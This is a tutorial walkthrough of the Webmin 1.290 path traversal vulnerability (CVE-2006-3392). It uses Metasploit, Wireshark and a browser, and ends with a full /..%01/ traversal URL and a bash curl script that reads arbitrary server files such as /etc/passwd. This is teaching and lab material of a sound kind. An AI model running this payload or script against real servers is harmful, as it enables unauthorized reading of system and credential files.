CVE-2006-3392 Webmin 1.290 Usermin 1.220 auxiliary(admin/webmin/file_disclosure)

CVE-2006-3392

Hello hackers!

Today we will talk about the Webmin CMS, it’s vulnerability and we will write our own script to exploit it.
 
First of all let’s disclose what is the Webmin. Webmin is a web-based system configuration tool for Unix-like systems, allows the user to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify and control open-source apps, such as the Apache HTTP Server, PHP or MySQL.
On the earliest versions of the Webmin such 1.290 and less there is path traversal vulnerability, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login.
Let’s look at it.
webmin login page
Webmin version 1.290

To exploit an error, let’s start the msfconsole, use auxiliary/admin/webmin/file_disclosure module and then set parameters: in our case, RHOSTS => localhost, RPORT => 80, RPATH to read => /etc/passwd.

auxiliary/admin/webmin/file_disclosure
auxiliary/admin/webmin/file_disclosure

And just run it.

As you can see we succsessfuly read the /etc/passwd file on the localhost.

run msfconsole
msf5 auxiliary(admin/webmin/file_disclosure) > run

Now, let’s try figuring out how it actually works. It will help us to better understand how the script works, write our own exploit and pwded some OSCP-likes machines without msfconsole 😉

First of all, we have to read an executive msf script and see what it is doing.

locate msf exploit
/usr/share/metasploit-framework/modules/auxiliary/admin/webmin/file_disclosure.rb

Examine the script showed that the payload is the simple HTTP request to the vulnerable host.

main payload
/usr/share/metasploit-framework/modules/auxiliary/admin/webmin/file_disclosure.rb

If you wasn’t able to understand the code it was ok 🙂 I was not able to do it from the the first attempt too. Let’s try something more understandable – let grab some packets 😉

All we have to do is to open Wireshark and run our metasploit script again.

As you can see the data on the 4th string looks familiar: /..%01. Let’s go deeper and try to analyze the stream.

msf and wireshark
wireshark

To do that, just select the string, click the right mouse button, select Follow and than TCP Stream.

follow the stream
TCP Stream

Wow, that’s extremely clear and looks familiar: /..%01/ characters were in the msf script. So, the full payload is

http://localhost:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

http stream
http://localhost:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

Let’s check it manualy, I mean try to insert the string into the address bar.

browser payload
browser

The last thing we have to do is to create an universal script.

As the host we define localhost (and you have to change it in the future according to your needs), port as a common webmin port, payload path and the file which we want to read (it is as an input parameter).

After that just curl it with the silence mode and… launch 🙂

#!/bin/bash

host=”localhost”;
port=”10000″;
path=”/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01″;
file=$1;

#exploit
curl -s “$host:$port$path$file”;

proof of concept
./CVE-2006-3392.sh /etc/passwd

The GitHub repository is via the link – https://github.com/IvanGlinkin/CVE-2006-3392